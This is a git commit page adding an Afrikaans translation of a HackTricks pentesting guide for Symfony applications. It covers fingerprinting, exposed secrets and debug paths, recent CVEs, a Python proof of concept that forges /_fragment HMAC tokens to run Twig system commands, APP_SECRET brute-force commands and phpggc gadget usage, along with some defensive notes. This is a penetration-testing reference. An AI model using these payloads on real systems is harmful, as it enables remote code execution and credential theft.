maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-web/symphony.md'

Browse Source
This commit is contained in:
Translator 2025-07-23 10:25:20 +00:00
parent 3a2e23a6fa
commit 7c3ac4ad7b
1 changed files with 117 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

121
src/network-services-pentesting/pentesting-web/symphony.md
View File

@ -2,10 +2,123 @@
{{#include ../../banners/hacktricks-training.md}}
Kyk na die volgende plasings:
Symfony is een van die mees gebruikte PHP-raamwerke en verskyn gereeld in assesserings van ondernemings, e-handel en CMS-teikens (Drupal, Shopware, Ibexa, OroCRM … almal inkorporeer Symfony-komponente). Hierdie bladsy versamel offensiewe wenke, algemene mis-konfigurasies en onlangse kwesbaarhede wat jy op jou kontrolelys moet hê wanneer jy 'n Symfony-toepassing ontdek.
- [**https://www.ambionics.io/blog/symfony-secret-fragment**](https://www.ambionics.io/blog/symfony-secret-fragment)
- [**hhttps://blog.flatt.tech/entry/2020/11/02/124807**](https://blog.flatt.tech/entry/2020/11/02/124807)
- [**https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144**](https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144)
> Historiese nota: 'n Groot deel van die ekosisteem loop steeds die **5.4 LTS** tak (EOL **November 2025**). Verifieer altyd die presiese klein weergawe omdat baie 2023-2025 sekuriteitsadvies slegs in patch-vrystellings reggestel is (bv. 5.4.46 → 5.4.50).
---
## Recon & Enumeration
### Finger-printing
* HTTP antwoordkoppe: `X-Powered-By: Symfony`, `X-Debug-Token`, `X-Debug-Token-Link` of koekies wat begin met `sf_redirect`, `sf_session`, `MOCKSESSID`.
* Bronkode lek (`composer.json`, `composer.lock`, `/vendor/…`) onthul dikwels die presiese weergawe:
```bash
curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'
```
* Publieke roetes wat slegs op Symfony bestaan:
* `/_profiler` (Symfony **Profiler** & debug toolbar)
* `/_wdt/<token>` (“Web Debug Toolbar”)
* `/_error/{code}.{_format}` (mooi foutbladsye)
* `/app_dev.php`, `/config.php`, `/config_dev.php` (pre-4.0 dev front-controllers)
* Wappalyzer, BuiltWith of ffuf/feroxbuster woordlyste: `symfony.txt` → soek vir `/_fragment`, `/_profiler`, `.env`, `.htaccess`.
### Interessante lêers & eindpunte
| Pad | Waarom dit belangrik is |
|------|----------------|
| `/.env`, `/.env.local`, `/.env.prod` | Gereeld verkeerd ontplooi → lek `APP_SECRET`, DB kredensiale, SMTP, AWS sleutels |
| `/.git`, `.svn`, `.hg` | Bronontsluiting → kredensiale + besigheidslogika |
| `/var/log/*.log`, `/log/dev.log` | Web-root mis-konfigurasie stel stapelspore bloot |
| `/_profiler` | Volledige versoekgeskiedenis, konfigurasie, dienshouer, **APP_SECRET** (≤ 3.4) |
| `/_fragment` | Toegangspunt gebruik deur ESI/HInclude. Misbruik moontlik sodra jy `APP_SECRET` ken |
| `/vendor/phpunit/phpunit/phpunit` | PHPUnit RCE as dit toeganklik is (CVE-2017-9841) |
| `/index.php/_error/{code}` | Finger-print & soms lek uitsondering spore |
---
## Hoë-impak Kwesbaarhede (2023-2025)
### 1. APP_SECRET ontbloot ➜ RCE via `/_fragment` (ook bekend as “secret-fragment”)
* **CVE-2019-18889** oorspronklik, maar *nog steeds* op moderne teikens wanneer debug geaktiveer is of `.env` blootgestel is.
* Sodra jy die 32-karakter `APP_SECRET` ken, stel 'n HMAC-token op en misbruik die interne `render()` kontroller om arbitrêre Twig uit te voer:
```python
# PoC vereis die geheim
import hmac, hashlib, requests, urllib.parse as u
secret = bytes.fromhex('deadbeef…')
payload = "{{['id']|filter('system')}}" # RCE in Twig
query = {
'template': '@app/404.html.twig',
'filter': 'raw',
'_format': 'html',
'_locale': 'en',
'globals[cmd]': 'id'
}
qs = u.urlencode(query, doseq=True)
token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
print(r.text)
```
* Uitstekende skrywe en uitbuitingskrip: Ambionics blog (verbind in Verwysings).
### 2. Windows Proses Hijack CVE-2024-51736
* Die `Process` komponent het die huidige werksgids **voor** `PATH` op Windows gesoek. 'n Aanvaller wat in staat is om `tar.exe`, `cmd.exe`, ens. in 'n skryfbare web-root op te laai en `Process` te aktiveer (bv. lêer ekstraksie, PDF generasie) verkry opdrag uitvoering.
* Gepatch in 5.4.50, 6.4.14, 7.1.7.
### 3. Sessie-Fiksasie CVE-2023-46733
* Die outentikasie wagwoord het 'n bestaande sessie-ID hergebruik na aanmelding. As 'n aanvaller die koekie **voor** die slagoffer outentiseer, neem hulle die rekening oor na aanmelding.
### 4. Twig sandbox XSS CVE-2023-46734
* In toepassings wat gebruikersbeheerde sjablone blootstel (admin CMS, e-pos bouer) kan die `nl2br` filter misbruik word om die sandbox te omseil en JS in te voeg.
### 5. Symfony 1 gadget kettings (nog steeds in erfenistoepassings gevind)
* `phpggc symfony/1 system id` produseer 'n Phar payload wat RCE aktiveer wanneer 'n unserialize() plaasvind op klasse soos `sfNamespacedParameterHolder`. Kontroleer lêer-oplaai eindpunte en `phar://` wrappers.
{{#ref}}
../../pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
{{#endref}}
---
## Exploit Cheat-Sheet
### Bereken HMAC-token vir `/_fragment`
```bash
python - <<'PY'
import sys, hmac, hashlib, urllib.parse as u
secret = bytes.fromhex(sys.argv[1])
qs = u.quote_plus(sys.argv[2], safe='=&')
print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
PY deadbeef… "template=@App/evil&filter=raw&_format=html"
```
### Bruteforce swak `APP_SECRET`
```bash
cewl -d3 https://target -w words.txt
symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target
```
### RCE deur blootgestelde Symfony Console
As `bin/console` bereikbaar is deur `php-fpm` of direkte CLI-oplaai:
```bash
php bin/console about # confirm it works
php bin/console cache:clear --no-warmup
```
Gebruik deserialisering gadgets binne die kasgids of skryf 'n kwaadwillige Twig-sjabloon wat op die volgende versoek uitgevoer sal word.
---
## Verdedigende notas
1. **Moet nooit debug ontplooi** (`APP_ENV=dev`, `APP_DEBUG=1`) na produksie nie; blokkeer `/app_dev.php`, `/_profiler`, `/_wdt` in die web-bediener konfigurasie.
2. Stoor geheime in omgewingsveranderlikes of `vault/secrets.local.php`, *nooit* in lêers wat deur die dokument-wortel toeganklik is.
3. Handhaaf patch bestuur teken in op Symfony sekuriteitsadvies en hou ten minste die LTS patch-vlak.
4. As jy op Windows loop, werk onmiddellik op om CVE-2024-51736 te verminder of voeg 'n `open_basedir`/`disable_functions` verdediging-in-diepte by.
---
### Nuttige offensiewe gereedskap
* **ambionics/symfony-exploits** geheim-fragment RCE, debugger roetes ontdekking.
* **phpggc** Klaar-gemaakte gadget kettings vir Symfony 1 & 2.
* **sf-encoder** klein helper om `_fragment` HMAC te bereken (Go implementasie).
## Verwysings
* [Ambionics Symfony “secret-fragment” Remote Code Execution](https://www.ambionics.io/blog/symfony-secret-fragment)
* [Symfony Security Advisory CVE-2024-51736: Command Execution Hijack on Windows Process Component](https://symfony.com/blog/cve-2024-51736-command-execution-hijack-on-windows-with-process-class)
{{#include ../../banners/hacktricks-training.md}}